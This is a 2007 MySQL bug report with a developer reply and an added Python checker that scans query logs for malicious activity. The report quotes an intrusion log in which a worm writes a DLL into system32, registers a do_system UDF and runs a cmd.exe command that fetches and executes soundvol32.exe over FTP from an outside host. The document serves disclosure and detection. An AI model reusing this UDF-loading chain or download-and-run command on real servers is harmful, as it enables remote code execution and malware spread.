Bug #29943 Security breach: Loading UDF's / writing to %system%
Submitted: 20 Jul 2007 21:18 Modified: 23 Jul 2007 11:18
Reporter: Tonci Grgin Email Updates:
Status: Won't fix Impact on me: None
Category:MySQL Server: User-defined functions ( UDF ) Severity:S1 (Critical)
Version:5.0.44 OS:Microsoft Windows (XP Pro SP2)
Assigned to: CPU Architecture:Any

[20 Jul 2007 21:18] Tonci Grgin
Description:
A virus logged in to the MySQL server using the root account and multiplied itself across the development box.

Here's log of what happened:
070715 15:58:06	      5 Connect     root@87.248.189.178 on mysql
070715 15:58:17	      5 Query       DROP TABLE IF EXISTS clown
		      5 Query       CREATE TABLE clown (line BLOB)
070715 15:58:21	      5 Query       INSERT INTO clown (line) VALUES(0x4D5A9000 --cut--)
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:22	      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'
070715 15:58:23	      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll'
070715 15:58:25	      5 Query       SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll'
070715 15:58:26	      5 Query       SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll'
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:28	      5 Query       SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll'
070715 15:58:30	      5 Query       SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll'
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll'
070715 15:58:31	      5 Query       SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll'
070715 15:58:32	      5 Query       SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll'
		      5 Query       CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'
070715 15:58:33	      5 Query       SELECT do_system("cmd.exe /c echo open 87.248.189.178 26751 > o&echo user 1 1 >> o &echo get soundvol32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &soundvol32.exe")
070715 15:58:34	      5 Query       DROP TABLE IF EXISTS clown

How to repeat:
Some info on how this virus manifests externally can be found in Bug#29694. This might be a duplicate of Bug#28341 and a reminder that it should be fixed...

Suggested fix:
We should only load UDF from our directory and never allow writing to that directory from inside MySQL.
[23 Jul 2007 11:18] Sergei Golubchik
In 5.1 there's an option to restrict udf loading from untrusted paths.
In 5.0 users may rely on udfs in the path - we cannot change it.

In either case, it is no bug that a user with FILE and INSERT privileges on mysql.* can run their own code. You should not use passwordless root accounts.
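Added example, not part of the bug report or of MySQL: a small Python checker that reads general query log lines of the shape shown in the report and flags the chain that the FILE + INSERT on mysql.* privileges mentioned above make possible: a hex literal starting with the PE "MZ" header, INTO DUMPFILE into a DLL search directory or with a loadable-library extension, CREATE FUNCTION ... SONAME, and the first call of the registered UDF. The sample log lines are constructed to mirror the report (192.0.2.10 is a documentation address); the regexes and the list of system directories are assumptions for MySQL 5.0 on Windows.

```python
import re

# One MySQL 5.0 general query log line: optional "YYMMDD HH:MM:SS", then
# thread id, command and argument (continuation lines carry no timestamp).
LOG_LINE = re.compile(r"^(?:(\d{6}\s+\d{1,2}:\d{2}:\d{2}))?\s+(\d+)\s+(\w+)\s+(.*)$")
DUMPFILE = re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\s+'([^']+)'", re.I)
CREATE_UDF = re.compile(
    r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)
PE_LITERAL = re.compile(r"\b0x4d5a", re.I)  # "MZ" header at the start of a hex blob

# Directories searched when a DLL is loaded by bare name, as in SONAME 'clown.dll'
# (assumed list for Windows); any write of a loadable library is also flagged.
SYSTEM_DIRS = ("/windows/system32", "/winnt/system32")
LOADABLE_EXT = (".dll", ".so")

def parse_line(line):
    # Returns {ts, thread, cmd, arg} or None when the line is not a log record.
    m = LOG_LINE.match(line)
    if not m:
        return None
    ts, tid, cmd, arg = m.groups()
    return {"ts": ts, "thread": int(tid), "cmd": cmd, "arg": arg.strip()}

def analyze(lines):
    # Returns (thread, kind, detail) findings for the write-DLL / load-UDF / call-UDF chain.
    findings, udfs = [], set()
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or rec["cmd"] != "Query":
            continue
        q = rec["arg"]
        if PE_LITERAL.search(q):
            findings.append((rec["thread"], "pe_blob", "MZ header in hex literal"))
        m = DUMPFILE.search(q)
        if m:
            path = m.group(1).lower().replace("\\", "/")
            if any(d in path for d in SYSTEM_DIRS) or path.endswith(LOADABLE_EXT):
                findings.append((rec["thread"], "file_write", path))
        m = CREATE_UDF.search(q)
        if m:
            udfs.add(m.group(1).lower())
            findings.append((rec["thread"], "udf_create", m.group(2)))
        for name in udfs:  # any call of a UDF registered earlier in the log
            if re.search(r"\b%s\s*\(" % re.escape(name), q, re.I):
                findings.append((rec["thread"], "udf_call", name))
    return findings

# Constructed sample mirroring the report's log; thread 6 is benign traffic.
SAMPLE_LOG = [
    "070715 15:58:06\t      5 Connect     root@192.0.2.10 on mysql",
    "070715 15:58:17\t      5 Query       CREATE TABLE clown (line BLOB)",
    "\t\t      5 Query       INSERT INTO clown (line) VALUES(0x4D5A9000)",
    "070715 15:58:22\t      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'",
    "\t\t      5 Query       CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'",
    "070715 15:58:33\t      5 Query       SELECT do_system('<command>')",
    "070715 15:59:00\t      6 Query       SELECT name FROM customers WHERE id = 7",
]
```

Running `analyze(SAMPLE_LOG)` yields four findings, all on thread 5, in the order pe_blob, file_write, udf_create, udf_call; the benign query on thread 6 produces none.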